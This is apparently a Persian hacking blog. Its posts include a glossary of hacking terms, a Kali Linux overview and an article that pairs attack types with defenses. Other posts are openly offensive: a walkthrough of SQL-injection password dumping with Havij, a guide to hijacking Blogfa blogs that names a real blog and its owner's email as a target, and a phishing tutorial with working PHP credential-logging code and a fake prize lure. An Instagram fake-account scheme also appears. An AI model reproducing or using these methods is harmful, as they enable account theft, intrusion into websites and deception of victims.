عضو شوید


نام کاربری
رمز عبور

:: فراموشی رمز عبور؟

عضویت سریع

نام کاربری
رمز عبور
تکرار رمز
ایمیل
کد تصویری
براي اطلاع از آپيدت شدن وبلاگ در خبرنامه وبلاگ عضو شويد تا جديدترين مطالب به ايميل شما ارسال شود



تاریخ : چهار شنبه 18 تير 1399
بازدید : 14
نویسنده : سید محمد جواد حسینی

افزایش فـــــالــــور

 

این آموزش توسط گروه بلک گوستس نوشته و امروزه جز چند راه آسان افزایش فالور و حتی شاید بهترین راه رایگان افزایش فالور است. 

خب ابتدا شما باید حداقال پنج اکانت اینستاگرام بسازید(بجز اکانت اصلی خودتان)برای این کار می توانید از طریق شماره تلفنتان یا جیمیل هایتان اکانت ها را بسازید برای ساخت از خود برنامه اینستاگرام یا سایت رسمی اینستاگرام استفاده کنید سپس برنامه فالور گیر اینستاگرام و کافه اینستاگرام و اپ کلونر رو از بازار یا مایکت یا...دانلود کنید بعد از طریق برنامه APP CLONERچندنمونه تکثیر کنید بعد از اینکار درهرکدام از برنامه ها یوزرنیم رو وارد کنید بعد فالو خودکار رو بزنید(پیشنهاد میشه موقع خواب این کارو انجام بدید)سپس بعد مدتی که سکه های زیادی جمع شد همه سکه هارو به اکانت اصلی انتقال بدید و با اکانت اصلی فالور بخرید با این کار نه پولی دادید نه به فالویینگ های شما اضافه شده و شما می توانید با عضو شدن در کانال فالورگیر اینستاگرام هرروز با هر اکانت بین 10یا100عدد سکه جایزه بگیرید و در آخر هفته همه سکه هارو به اکانت اصلی انتقال بدید که اینطوری بدون هیچکاری حداقل200تا فالور در هفته بگیرید یا با عضو شدن در ربات تلگرام برنامه کافه اینستا و معرفی ربات به مخاطباتون سکه جایزه بگیرید.

امیدوارم لذت برده باشید

 



:: برچسب‌ها: افزایش فـــــالــــور ,
تاریخ : چهار شنبه 18 تير 1399
بازدید : 15
نویسنده : سید محمد جواد حسینی

در این بخش قصد دارم شمارو با یک سری از اصطلاحات روزمره که هکرها با آنها سرو کار دارند آشنا کنم .

 

✅_تارگت Target

در لغت به معنای هدف و واحد است و بعنوان مثال :

شما زمانی که سایتی برای نفوذ در نظر دارید ، به اصطلاح به این هدف شما تارگت گفته میشود .

✅_ باگ Bug

باگ ها یا حفره‌های امنیتی یا خرابی های امنیتی و یا به همان حفره های امنیتی گفته میشود و این خرابی ها از اشکالات و سهل انگاری های برنامه نویسان وب و صفحات وب است وهکر از این نقاط ضعف به نفع خود برای هر نوع هدفی استفاده میکند و زمینه های نفوذ به سایت ها همین باگ ها و خرابی ها هستند.

✅_ دیفیس Deface

در کل به معنای تغییر ظاهری سایت یا یک صفحه است و برای درک بهتر زمانی که شما تارگت مورد نظر را هک میکنید برای اثبات هک خود ، صفحات سایت (یا صفحه اصلی) را تغییر میدهید و به اصطلاح به این عمل شما دیفیس کردن گوییم و یعنی شما سایت را دیفیس یا همان هک کرده‌اید .

✅_ بایپس Bypass

به معنای دور زدن یا همان میانبر است و گاهی اوقات در زمانی که شما در حال هک کردن تارگتی هستید ، برخی از دستورات اجرا نمیشوند و یا به خاطر ابزارهای امنیتی سایت ، یا هر چیز دیگری نمی توانید دسترسی بگیرید و حال هکرها برای ادامه دادن به هک ، با مشکل مواجه میشوند پس به کمک انواع روش ها این دستورات رو به نوعی وارد و ابزار محافظتی را دور میزنیم که به این کار بایپس کردن گوییم.

✅_ اکسپلویت Exploit

کدهای مخربی هستند که بنا به نیاز نفوذگر نوشته میشوند و توسط برنامه نویسی زبان C , ++C , Perl , Python ,.. نوشته می شوند ( البته همه آنها مخرب نیستند ) .

✅_ فیک پیچ Fake Page

بعضی از هکرها صفحه ایی مانند صفحه ی ورود به سایت طراحی میکنند و این صفحه ها مانند بقیه ی صفحات اینترنتی هستند ولی فرق اینها در کدنویسی آنهاست که اکثرا کد نویسی ها به صورتی است که وقتی قربانی یوزرنیم و پسورد خود را وارد این صفحه میکند یوزرنیم و پسورد برای هکر ارسال میشود نه به سایت مربوطه و البته این نوع حمله بیشتر برای هک ایمیل ها و اکانتهای مختلف استفاده میشود.
ولی از این روش هم میتوان برای هک سایت استفاده کرد.

✅_ دورک Dork

دورک ها سری کدهایی هستند که فرد برای جستوی سریع و دقیق تر در موتور های جستجو گر از آن استفاده میکند و برای این گفتم فرد چون مختص به هک کردن نیست و میشه از این طریق اطلاعات بسیار خوبی رو بدست آورد .

✅_ گوگل هکینگ Google Hacking

ساده ترین تعریف: استفاده از گوگل جهت هک را گوگل هکینگ میگویند یعنی اینکه هکر توسط سرچ هایی که در گوگل انجام می دهد قربانیان خود را پیدا می کند .

✅_ هش Hash

هش ها یه جور الگوریتم و روش های کد گذاری و رمزگذاری متن هاست و مدل هایی از جمله :


✅_ ا) MD5 -MD4

✅_ ا) MySql

✅_ ا) WordPress

✅_ ا) Joomla

و… دارد .

✅_ کرک Crack

در کل به معنای شکست و نفوذ است که این نفوذ میتواند به برنامه ها باشد و این شکستن میتواند شکستن پسوردها و متن های رمزنگاری شده باشد .

✅_ پچ Patch

به معنای جایگزین و درست کردن چیزی و مثل پچ کردن باگ ها و بر طرف سازی همان اشکالات امنیتی می باشد و ….

✅_ هگز Hex

یک نوع الگوریتم رمزنگاری است و همچنین یکی از روشهایی که هکرها برای بای پس استفاده می کنند این طریق است .

✅_ پورت Port

یک سری درگاه های اتصال و انتقال میباشد , مثل : ۲۱۲۱ ,۸۰ ,۸۰۰۰ ,….

PedramFCI, [30.12.16 18:43]
[Forwarded from BlackhatFCI]
✅_ اف تی پی Ftp

ا) FTP یا پورت ۲۱ که مخفف File Transfer Portocol است یعنی پروتکل انتقال فایل و این پورت برای انتقال فایل به کار میرود و این انتقال در دو جهت آپلود و دانلود انجام میشود .

✅_ شل Shell

شل در لغت به معنی پوسته است و در سیستم عامل های لینوکس جزء قسمت هایی است که رابط کاربر بین سخت افزار می باشد و در مفاهیم هکینگ هنگامی که شخص نفوذگر با استفاده ابزارها و کارهای خود می تواند به سیستم مورد نظر خود نفوذ کامل کند و کنترل سیستم را به دست بگیرد اصطلاحاً می گویند شل گرفته است و می تواند تصمیمات خود را عملی گرداند .

 



:: برچسب‌ها: اصـطـلـاحـات هــــک ,
تاریخ : چهار شنبه 18 تير 1399
بازدید : 24
نویسنده : سید محمد جواد حسینی

آموزش هک سایت با نرم افزار هویج

 

 میخوام آموزش ساده و کلی استفاده از نرم افزار هویج رو یاد بدم. چون بعدا از همه این آموزش ها فیلم میزارم .هویج چیست : هویج یک نرمافزار که شما رو برای هک سایت های که باک sql دارند کمک میکنه با استفاده از این نرم افزار شما براحتی میتونید تعداد column و آسیب پذیری ها رو بدست آورید و همچنین از این طریق username و password ادمین بدست آورید همچنین میتوانید admin page و hash ها رو نیز بدست آورید. قبل از شروع باید برنامش رو دانلود کنید برای این کار از بخش ابزار هک sql متونید دانلود کنین خب اول باید 

تارگت خودتونو پیدا کنید. باید آخر آدرس سایت مورد نظر حتما عدد باشه مثلا:lang=0 که ما باید آخرش یک (( \' )) اضافه کنیم(مثلا: target.com/news.php?lang=0\' Enter konid ). اگه سایت به صورت نصفه و ناقص لوئد نشد بی خیال بشین اگه شد باگ داره به کارتون ادامه بدین. برنامه هویج رو باز کنید و در قسمت Target آدرس سایت مورد نظر رو بدون (( \' )) وارد کنید بعد Analyze رو بزنید. برنامه شروع به آنالیز میکنه... وقتی آنالیز تموم شد Column ها شمرده و انتخاب شده اند. حالا از کادر بالا سربرگ های پر کاربرد رو معرفی میکنم Info=نمایش اطلاعات ابتدایی آنالیز Tables=برای پیدا کردن تیبل ها Find Admin=برای پیدا کردن صفحه ورود و مدیریت سایت MD5=برای کرک کردن پسورد های هش شده خب اول روی گزینه Tables میریم بعد روی قسمت Get Tables میریم تا همه Table ها نمایش داده بشن.بعد از این که تیبل ها نمایش داده شدند باید تیبلی که نام کاربری و پسورد ادمین و کاربرای سایت گنجونده شده اند رو پیدا و انتخاب و نهایتا Get Columns رو کلیک کنید. حالا زیر شاخه های مورد نظر رو انتخاب کرده و گزینه Get Data رو انتخاب میکنیم تا رمز و نام کاربری رو نشون بده وقتی دستورات فوق را انجام دادین میبینین که پسورد هش شده هستش و ما میتونیم از سربرگ MD5 برای کرک کردن پسورد استفاده کنیم.

 



:: برچسب‌ها: آموزش هک سایت با نرم افزار هویج ,
تاریخ : چهار شنبه 18 تير 1399
بازدید : 37
نویسنده : سید محمد جواد حسینی

 

{آموزش هک وبلاگ}


من تمام روش های هک وبلاگ رو براتون می گم و عملی بودن یا نبودن اونها رو هم براتون می گم. (البته همشون ممکن هستند ولی احتمال به موفقیت رسیدن بعشی هاشون پایین هست و بعضی ها هم بالا)
این هم اضافه کنم که این سایت هیچ مسئولیتی در برابر استفاده نا صحیح از این مقاله رو نداره.

برسیم به روش های هک وبلاگ که من از آسون تا سخت براتون می گم :

1- هک ایمیل نویسنده ی وبلاگ :
2- استفاده از صفحات تقلبی (Fake Page) و یا ایمیل قلابی
3- استفاده از IP Sniffer 
4- کشف باگ سرورها و نفوذ در آنها

روش اول (هک ایمیل نویسنده) :
در این روش باید تمام روش های هک ID و Email رو بکار ببرید که آموزش هاش رو بعدا می زارم (البته تو اینترنت زیاده. مثل هک از طریق صفحه ی تقلبی و ....). بعد از اینکه پسورد به دست آوردید , به آدرس سرور برید و پسورد وبلاگ رو به راحتی بگیرید. مثلا برای سرور بلاگفا به آدرس زیر می ریم : www.blogfa.com و روی کلمه عبور را فراموش کردم کلیک می کنید و نام وبلاگ و آدرس ایمیل نویسنده رو که هک کردید رو وارد می کنید و در صورت درست بودن هر دو تا یک یک ایمیل با آن آدرس ایمیل از طرف بلاگفا ارسال می شه که حاوی پسورد جدید وبلاگه و این جوری می تونید وارد کنترل پنل وبلاگ شده و هر کار که با وبلاگ دوست دارید بکنید. 
مثلا برای هک کردن این وبلاگ itgirls.blogfa.com : ابتدا ایمیل نویسنده (که it_girls86@yahoo.com  هست) رو پیدا می کنیم. حالا قسمت سخت این روش هک این ایمیله. بعد طبق بالا پسورد وبلاگ رو در می آریم و .....
دیدید چقدر راحته؟ 


روش دوم (استفاده از صفحه قلابی)
اول از همه بگم صفحه تقلبی چیه ؟ صفحات وبی (شبیه صفحات log in سایت های معروف) که با نوشتن پسورد به جای ورود به وبلاگ , پسورد برای آدرس شما ارسال می شه. این صفحات با نوشتن یک سری کد تو صفحه بدست می آن.
شما می تونید از این صفحات استفاده کنید و مثل یک هکر با شخصیت , وبلاگ هک کنید. من صفحه ی تقلبی بلاگفا رو براتون گذاشتم فقط باید به جای ایمیل ali.naghavi.it@gmail.com ایمیل خودتون رو وارد کنید و فایل جدید رو با پسوند .html  سیو کنید. حالا باید توی یک فضای رایگان آپلود کنید.
بعد وارد مرحله ی حساس گول زدن می شیم که به ضریب هوشی شما (هکر) بستگی داره و به اندازه ی زرنگی خودتون می تونید تعداد زیادی وبلاگ هک کنید. البنه یک مقاله در مورد مهندسی اجتماعی می زارم که گول زدن هم یاد بگیرید.
مثلا شما می تونید بگید :
سایت بلاگفا یک تعداد امکانات جدید از جمله : بازدید های امروز و دیروز و ماه و سال , وصل وبلاگ بلاگفا به دامین , حذف پسوند  blogfa.com به هر چیزی که می خواهید و ... را آماده کرده است. برای دیدن همه ی امکانات بر روی لینک زیر کلیک کنید.
اینجا هم می تونید آدرس صفحه ی تقلبی تون رو بزارید
این فقط یه نمونه هست که می تونید از طرف بلاگفا تو نظرات وبلاگ ها ی دیگه بزارید
روش سوم (استفاده از IPSniffer) 
برنامه های IPSniffer که یکی از نمونه های رایج اون Packet Sniffer Earth Detect هست. این برنامه مثل چی می گرده وبلاگهایی که که در آن لحظه ON  هستند رو پسوردش رو پیدا می کنه. البته پسوردها به صورت کد شده هستند و باید کرک شن که شما می تونید از برنامه هایی مثل John the rippr , L0pht crack , Palm crack و ... استفاده کنید. اما من برنامه ی Cain رو پیشنهاد می کنم. این برنامه علاوه بر اینکه خودش یک Sniffer هست یک کراکر بسیار قوی هم هست. بنایراینکار دوتا برنامه رو براتون انجام میده.
لینک دانلود Cian برای XP : 
http://www.oxid.it/downloads/ca_setup.exe

البته استفاده از Sniffer به مودم شما هم بستگی داره و در بعضی مودم ها کار نمی کنه و در کل خیلی هم عملی می شه چون معمولا سرورها هم امنیتشون تقریبا بالا رفته و سخته که کار کنه ولی شما رو همه ی سرورها امتحان کنید. چون اگه جواب بده شما 40 تا 40 وبلاگ هک می کنید.
روش چهارم (کشف باگ سرورها و نفوذ در آنها)
این روش نیاز به دانش هکری بالا و اشنایی با مفاهیم شبکه و اشنایی کار کردن با نرم افزارهای اسکنر و اکسپلویت ها و بسیار از چیزهای دیگه دارد, و برای کسانی که تازه وارد مقوله هک شده اند بسیار دشوار است. البته به شما پیشنها د می کنم  که حتما نبال این ها بروید و دانش تون رو تو این زمینه ها بدید و دیگه از هک آی دی و وبلاگ و این جور بچه بازیها دست بردارید.
من یک تصویر ذهنی برای شما در این زمینه می سازم . شما می یابد مثلآ یک سرور مثل همین بلاگفا خودمون رو توسط نرم افزارهای اسکنر(Nssus , NMAP , Retina,Xscan , languard , attack TOOLKit’Atk و...) اسکن می کنید و آسیب پذیری های (Vulnerability) اون رو پیدا می کنید  و آسیب پذیری های (Vulnerability) اون رو پیدا می کنید. بعد توسط اکسپلویت (Exploit) هایی که برای آن آسیب پذیری ها نوشته شده نفوذ می کنید و کنترل اون رو به دستتون می گرید. البته شاید به نظر شما آسون بیاد اما یادتون باشه که سرورها هم گاگول (!) نیستند و سعی می کنند امنیتشون رو بالا ببرند اما همیشه امنیت کامل برقرار نیست. مطمئن باشید که سرورها قبل از شما سرور خودشون رو اسکن کردند و باگ های اون رو پیدا کردند ولی اینجا بر می گرده به شانس و اسکنر شما. البته اگه علم هکینگ تون انقدر بالا باشه که بتونید دستی سرورها رو چک کنید مطمئنا باگ پیدا می کنید. البته تو این روش صاحب وبلاگ هیچ کاری برای جلوگیری از هک شدن نمی تونه بکنه. فقط می تونه اگه باگی پیدا کرد سریع گزارش بده تا رفع شه.
من اینجا امنیت سرورهای خودمون رو از بهترین تا بدترین براتون لیست کنم :
ا1-  Persiangig  *
ا2- Blogfa
ا3- Parsblog  
ا4- caspianblog 
ا5-  Mihanblog
ا6-  Persianblog **

به پایان مقاله رسیدیم. این مطالب فقط برای بالا بردن اطلاعات شما در زمینه ی هک و امنیت شبکه هست. از این مطالب می تونید برای بالا بردن امنیت وبلاگتون استفاده کنید. من خواهش می کنم که از این مطالب استفاده ی به جا داشته باشید , چون همونطور که خود شما انتظار دارید کسی همچین بلایی سر خودتون بیاره !

* این سایت در حقیقت سرویس دهنده ی وبلاگ نیست بلکه یک هاست 100 مگابایتی رایگان برای ایرانیان است که می شه برای وبلاگ هم استفاده کرد اما برای افراد نا آشنا به امور برنامه نویسی وب کار دشواری هست.
** من به هیچ وجه این سرویس دهنده رو پیشنهاد نمی کنم. چون به دلیل امنیت بسیار پایین چند وقت پیش هک شد و تمام وبلاگ ها بسته شدند.

 

هرگونه سواستفاده به عهده خود کاربر است.

 



:: برچسب‌ها: {آموزش هک وبلاگ} ,
تاریخ : چهار شنبه 18 تير 1399
بازدید : 16
نویسنده : سید محمد جواد حسینی

آموزش هــــک ســـایت

در این مقاله قصد داریم راه های مختلف هک شدن سایت و راه های جلوگیری از هک سایت را بررسی کنیم. قبل از اینکه بدانیم چگونه باید امنیت سایت را برای مقابله با هک شدن بالا ببریم باید بیاموزیم چگونه باید یک وب سایت را هک کنیم، پس باید بدانیم آیا آن وب سایت هک شدنی هست یا نه!!! یا اگر هک شدنی هست آیا راه نفوذ به وب سایت مذکور ساده است یا پیچیده؟! سایتی هک می شود که باگ امنیتی داشته باشد. باگ در لغت به معنای حفره و در اصطلاح هکر ها یعنی راه نفوذ به وب سایت و هک کردن آن.

انواع هک

اول انواع هک را مشخص کنیم و بعد بریم سراغ طریقه انجام هک!

هک کردن انواع مختلف دارد اما می توانیم به دو دسته کلی هک سمت سرور (Server Side) و هک سمت کاربر (Client Side) تقسیم کرد.

هک سمت کاربر یعنی از خود کاربر برای هک کردن او استفاده کنیم. مثلا هنگامی که می خواهد وارد ایمیلش شود پسوردش را بدزدیم یا هنگامی که می خواهد اطلاعات بانکی اش را برای خرید اینترنتی وارد کند اطلاعاتش را ذخیره کنیم. اما چگونه!؟ رایج ترین این نوع هک تروجان می باشد. تروجان یعنی ساختن یک صفحه کاملا شبیه صفحه ورود به ایمیل یا بانک و ... و کشاندن کاربر با ترفندهای حاص به آن صفحه. کاربر که نمی داند آن صفحه صفحه شخصی شماست اطلاعاتش را براحتی وارد پایگاه داده شما می کند و در اختیار شما قرار می دهد.

راه جلوگیری: شما به عنوان یک کاربر باید هوشمند باشید و موقع وارد کردن اطلاعات شخصی مثلا ایمیل و پسورد حتما داخل آدرس بار را چک کنید که سایت مورد نظر دقیقا همان است که شما داخلش هستید؟ مثلا:

http://mail.google.com

https://mail-google.com

https://mail.googel.com

این سه آدرس می تواند اطلاعات ایمیل و پسورد ایمیل شما را براحتی از شما بدزده!! چون این سایت ها هیچ ربطی به گوگل نداره و سایت های شخصی هستند که می خواهند اطلاعات شما را بگیرند. آدرس درست این می باشد:

https://mail.google.com

هک سمت سرور که بسیار رایج تر می باشد و انعطاف بیشتری دارد. این هک خود انواع مختلف دارد که مهمترینشان:

  • Xss
  • استفاده از شل
  • sql Injection
  • Lfi
  • Rfi

Xss

این باگ که یکی از فراوان ترین باگ های موجود میباشد که طبق آمار 69 درصد وبسایت ها این باگ را دارن. از نظر امنیتی باگ مهمی به حساب نمیاد با استفاده از این باگ میشه روی سیستم قربانی انواع اقسام نفوذ رو انجام داد.(در قسمتی از سایت که باگ دارد شما قادر به اجرا کردن کد های JavaScript هستید که با استفاده از کد های جاوا اسکریپ کار های زیادی میشه انجام دارد!!!) 

استفاده از شل

شل یک فایل حاوی کد های اسکریپت مخرب است که هکر آن را در سایت شما آپلود می کند و سپس در سرور شما اجرا می کند! آپلود کردن فایل شل از راه های مختلف امکان پذیر است. مثلا از قسمت browse که شما در سایت خود قرار داده اید تا کاربران فایل های خود را آپلود کنند یا عکس های خود را آپلود کنند.

راه جلوگیری: یکی از کارهایی که می توانید جهت جلوگیری انجام دهید این است که فایل هایی که آپلود می شود را چک کنید. مثلا برای عکس فقط اجازه فایل های png,jpg,bmp,gif را بدهید.

راه دیگر آپلود فایل شل به این صورته: هکر به این صورت کار خود را آغاز می کند که با یک جستجوی ساده نام میزبان شما را در می آورد.مثلا میزبان شما شرکت X است.بعد چک می کند و می بیند که میزبان شما علاوه بر سایت شما 100 سایت دیگر را هم میزبانی می کند.خب شروع می کند به جستجو و با کمی جستجو اون 100 سایت را پیدا می کند.حالا نوبت به هک کردن می رسد.منتها این بار نه سایت شما.بلکه سایت همسایه ی شما!اون سایت که احتمالا ادمین آن یادش رفته اصلا حتی پسورد بیشتر از 6 کاراکتر بگذارد به راحتی هک می شود.خلاصه بعد ازهک سایت همسایه ی شما ، با یک شل مخصوص که خودش اون رو دی کد کرده (نا خوانا توسط آنتی ویروس) از سرور شما دسترسی روت می گیرد (یعنی به تمام فایل های موجود در کامپیوتر سرور که میزبانی سایت شما و اون 100 سایت دیگر را بر عهده دارد دسترسی پیدا می کند) و سایت شما را هک می کند.

راه جلوگیری: از سرور اختصاصی استفاده کنید، که هزینه زیادی برایتان ایجاد می کند.

Sql Injection

این نوع هک اکثرا از آدرس بار، جایی که آدرس سایت را می نویسید در بالای مرورگر انجام می شود. هک کردن از این روش رایج ترین و قدیمی ترین روش هاست که با چند دستور ساده می توانید تمام اطلاعات پایگاه داده را بیرون بکشید. هکر ها برای این کار از تزریق کد های sql وارد عمل می شوند. این نوع هک از صفحاتی از سایت که دارای query string می باشد انجام می شود. امروزه وب مسترها به این نوع هک آگاهی کامل دارند و معمولا جلوی این راه های نفوذ را می گیرند. اما هنوز هم وب سایت های فراوانی یافت می شوند که این حفره بزرگ را دارند.

راه جلوگیری: استفاده از stored procedure و یا داده های پارامتری در دیتا بیس و یا چک کردن query string با استفاده از الگوریتم برنامه نویسی و تشخیص اینکه تزریق انجام شده یا نه!!

Lfi و Rfi

این باگ با بی احطیاتی برنامه نویس در استفاده از توابع Include و ... به وجود میاد.
در اصل این توابع (include , require ... ) فایل یا صفحه ای رو فراخوانی میکنن که اگر روی این درخواست کنترلی نباشه میتونه منجر به باگ Rfi یا حتی Lfi بشه.
هک Lfi یا Local File Inclusion یک نوع دسترسی لوکال به هکر برای مشاهده ی فایل های سرور مورد نظر میده (یعنی به همه چیز روی سایتتون "نه سرورتون" دسترسی پیدا می کنه!). که همانطور که ذکر شد باگ Lfi بیشتر در اشتباهات برنامه نویس در استفاده از توابعی مثل Include ,require() و غیره رخ میده.
با استفاده از این باگ حرکت های زیادی میشه کرد از جمله:

1 - تبدیل آن به اجرای دستورات از راه دور با استفاده از لوگ های Apache
2 - خواندن فایل های مهم سیستمی با فایل های config
و ...

 



:: برچسب‌ها: آموزش هــــک ســـایت ,
تاریخ : چهار شنبه 18 تير 1399
بازدید : 5
نویسنده : سید محمد جواد حسینی


تاریخ : چهار شنبه 18 تير 1399
بازدید : 3
نویسنده : سید محمد جواد حسینی


تاریخ : چهار شنبه 18 تير 1399
بازدید : 16
نویسنده : سید محمد جواد حسینی

فـیـک پـیـج

 

بعضی از عزیزان دوست دارند یاد بگیرن که فیک پیج بسازن

آموزشی که میدم کلیه یعنی هر سایتی که خواستید رو میتونید ازش فیک پیج بسازید !
خوب دیگه زیاد حرف زدم میریم سر آموزش :

1- اول سایتی رو که میخواید ازش فیک پیج بسازید رو باز کنید .

2- بعد از باز کردن سایت تا لود شدن کامل صبر کنید . حالا راست کلیک زده گزینه save page as رو بزنید و صفحه را در حالت web page complete ذخیره کنید .

3- حالا صفحه را با notepad باز کرده و Ctrl+F رو بزنید تا گزینه find بیاد . توش بنویسید login و فایند رو بزنید . احتمالا پشت login نوشته action . خوب ما همون login رو لازم داریم . ممکنه login با پسوند php ( که عالیه ) و یا aspx و یا هر چیز دیگری ذخیره شده باشه . من آموزشی که دادم برای php هستش . اگه پسوند چیز دیگه ای بود تو ادامه همین پست بگید تا بگم چجوریه . خوب اگه login.php پشتش هرچی هست ، پاکش کنید . مثلا اگه به صورت http://www.test.com/login.php ، شما فقط login.php اینو بزارید . بعد اگه method="post" هستش شما اونو به method="GET" تغییر بدید .

4- فعلا اینا رو بزارید کنار یه notepad جدید باز کرده این کد پایین رو توش بریزید :

header ('Location: http://target.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
به جای http://target.com اسم سایت مورد نظر رو بنویسید . دقت کنید اگه صفحه لاگین رو میخواید بسازید باید برای همون صفحه این کار رو انجام بدید . مثلا اگر برای mail.yahoo.com میخواید فیک درست کنید نرید این کارا رو روی yahoo.com انجام بدیدا !!!
خوب حالا فایل را به نام login.php ذخیره کنید . فایل اول رو هم با پسوند html ذخیره کنید .

5- برید توی یه سایت فضای رایگان مثل www.my3gb.com یا http://www.000webhost.com که php رو برای آپلود ساپورت کنه عضو شوید . و هر دو فایل رو آپلود کنید . اگه بلد نیستید روی سایت فایل آپلود کنید اشکال نداره ، توی فیلمی که بعدا میزارم آموزش اونم میدم . اگه کسی بلد نبود پیام بده یادش میدم

6- حالا کافیه آدرس اون فایل .html تون رو به طرف بدید و بگید شما در قرعه کشی امسال برنده یک خودروی مزدا3 شده اید . لطفا برای اطلاعات تکمیلی به این آدرس بروید !!!

7- طرف یوزر و پسوردش رو وارد کرده روی دکمه login.php کلیک میکنه . بعد بوووومب !!!
اگه به کد login نگاه کرده باشید یه جا نوشته log.txt . اون همون جایی که یوزر و پسورد طرف توش ذخیره میشه . نگران نباشید جاش امنه ! توی همون هاست خودتون این فایل با کلیک طرف اتوماتیک وار درست میشه .

امیدوارم تونسته باشیم کمکی بهتون بکنیم

 



:: برچسب‌ها: فـیـک پـیـج ,
تاریخ : چهار شنبه 18 تير 1399
بازدید : 11
نویسنده : سید محمد جواد حسینی

کالـی لـیـنـوکـس

 

Kali Linux یکی از توریع های لینوکس است که توجه اکثر هکر ها را به خود جذب کرده ، این سیستم عامل قدرتمند با نماد اژدها به جای سیستم عامل بک ترک نشسته و بیشتر برای تست نفوذ استفاده می شود. این توزیع به پشتوانه ی Debian منتشر شده و حتی از روی usb فلش هم قابل اجراست.
با Kali Linux شما می توانید به انواع شبکه ها ، وب ساتها ، تلفن های همراه ، تلبت ها و …. به راحتی نفوذ کنید و از هک لذت ببرید.

برای دانلود آخرین ورژن Kali Linux بر این لینک کلیک نمائید و پس از ورود به صفحه مورد نظر نام و ایمیل خود را وارد نمائید ، سپس دکمه Register & Download را بفشارید تا وارد صفحه دانلود شوید . حال بسته به نوع سیستم خود نسخه مورد نظر را انتخاب و دکمه Download Kali را کلیک کنید.

 

خصوصیات مهم کالی لینوکس

داشتن بیش از ۳۰۰ ابزار تست و نفوذ : پس از بررسی همه ی ابزار های بک ترک تیم توسعه ی کالی بهتر دید برخی از ابزارهایی که کار نمی کنند را حذف کند و تنها ابزارهای مفید و تست شده را در کالی اعمال کند.

کالی رایگان است و همیشه خواهد ماند : Kali لینوکس همانند جد خود بک ترک رایگان عرضه می شود و همیشه رایگان خواهد ماند و شما هرگز برای تهیه ی آن پولی نخواهید پرداخت !
منبع باز و اوپن سورس : شما قادر خواهید بود هر نوع تغییری را در کالی لینوکس اعمال کنید و از تمامی مزایای اوپن سورس بهره ببرید .

سازگار با FHS : کالی لینوکس با پایبندی به استاندارد فایل سیستم سلسه مراتب توسعه یافته است .

پشتیبانی بیشتر کارتهای شبکه ی وایرلس : کالی لینوکس را طوری ساخته اند که قادر است بیشتر کارتهای شبکه وایرلس اینترنال وکارت های شبکه ی وایرلس USB را شناسایی و پشتیبانی کند.

هسته ی سفارشی : برای تست نفوذ تیم توسعه اغلب به ارزیابی های وایرلس دارد و هسته آخرین قوای پشتیبانی برای تزریق است.

محیط توسعه امن : تیم توسعه ی کالی لینوکس از یک گروه کوچک و قابل اعتماد تشکیل شده است و تنها مخازن امن را در کالی قرار می دهند.

تعهد GPG : هر بسته ای در کالی باید امن باشد و تیم توسعه ی هر بسته نسبت به امنیت واعتماد آن بسته تعهد می دهد و برای محکم بودن این تعهدات قرارداد های دو طرفه صورت میگیرد.

پشتیبانی از انواع زبان ها : با این که کالی به صورت پیش فرض دارای زبان انگلیسی است اما توانایی پشتیبانی از تمامی زبان های زنده ی دنیا را دارد.

کاملا قابل تغییر است : با این که در حالت پیش فرض کالی دارای محیط کاربری گنوم ۳ است اما کاربران قادر خواهند بود محیط و تنظیمات دلخواه خود را بر روی کالی لینوکس اعمال کنند.

پشتیبانی از سیستم های ARMEL و ARMHF : تیم توسعه ی کالی می داند که سیستم های مبنی بر ARM رو به افزونی و رایج شدن هستند و کالی سعی دارد تا خود را با این نوع سیستم ها سازگار تر کند و هر روز بر این قابلیت خود می افزاید , در حال حاضر کالی سیستم های ARM زیر را پشتیبانی می کند :

rk3306 mk/ss808

Raspberry Pi

ODROID U2/X2

Samsung Chromebook

 



:: برچسب‌ها: کالـی لـیـنـوکـس ,
تاریخ : چهار شنبه 18 تير 1399
بازدید : 16
نویسنده : سید محمد جواد حسینی

VPS یا سرور مجازی چیست؟

 



:: برچسب‌ها: VPS یا سرور مجازی چیست؟ ,

صفحه قبل 1 2 صفحه بعد

به وبلاگ من خوش آمدید

نام :
وب :
پیام :
2+2=:
(Refresh)

تبادل لینک هوشمند

برای تبادل لینک ابتدا ما را با عنوان پرشین هک اورجینال و آدرس persianhack_original.LXB.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.






RSS

Powered By
loxblog.Com